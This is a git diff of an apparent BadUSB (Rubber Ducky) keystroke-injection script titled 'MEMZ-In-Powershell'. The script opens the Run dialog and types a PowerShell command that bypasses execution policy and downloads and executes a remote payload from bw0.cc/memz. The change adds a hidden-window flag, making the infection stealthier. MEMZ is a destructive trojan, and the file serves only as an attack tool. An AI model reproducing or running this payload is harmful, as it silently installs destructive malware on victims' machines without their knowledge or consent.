diff --git a/MEMZ-In-Powershell/MEMZ-In-Powershell.txt b/MEMZ-In-Powershell/MEMZ-In-Powershell.txt index d8272f8..d4f12eb 100644 --- a/MEMZ-In-Powershell/MEMZ-In-Powershell.txt +++ b/MEMZ-In-Powershell/MEMZ-In-Powershell.txt @@ -11,7 +11,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -C irm https://bw0.cc/memz | iex +STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/memz) ENTER